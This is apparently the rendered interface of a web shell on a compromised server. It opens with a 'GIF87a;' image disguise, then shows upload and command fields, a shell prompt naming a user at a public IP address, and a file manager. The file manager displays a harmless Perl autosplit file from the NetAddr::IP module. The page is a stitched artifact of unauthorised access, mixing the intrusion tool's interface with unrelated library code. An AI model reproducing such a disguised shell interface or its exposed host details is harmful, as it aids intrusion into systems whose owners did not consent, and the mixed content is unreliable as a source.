GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@18.191.103.248: ~ $
# NOTE: Derived from blib/lib/NetAddr/IP.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package NetAddr::IP;

#line 860 "blib/lib/NetAddr/IP.pm (autosplit into blib/lib/auto/NetAddr/IP/short.al)"
sub short($) {
  my $addr = $_[0]->addr;
  if (! $_[0]->{isv6} && isIPv4($_[0]->{addr})) {
    my @o = split(/\./, $addr, 4);
    splice(@o, 1, 2) if $o[1] == 0 and $o[2] == 0;
    return join '.', @o;
  }
  return _compV6($addr);
}

# end of NetAddr::IP::short
1;

Filemanager

Name Type Size Permission Actions
InetBase Folder 0755
Util Folder 0755
UtilPP Folder 0755
.packlist File 3.61 KB 0644
_compV6.al File 1 KB 0444
_compact_v6.al File 1.01 KB 0444
_splitplan.al File 2.91 KB 0444
_splitref.al File 936 B 0444
autosplit.ix File 388 B 0444
canon.al File 362 B 0444
coalesce.al File 1.35 KB 0444
compactref.al File 1.67 KB 0444
do_prefix.al File 891 B 0444
hostenum.al File 329 B 0444
mod_version.al File 427 B 0444
nprefix.al File 603 B 0444
prefix.al File 605 B 0444
re.al File 1.4 KB 0444
re6.al File 1.83 KB 0444
short.al File 500 B 0444
wildcard.al File 485 B 0444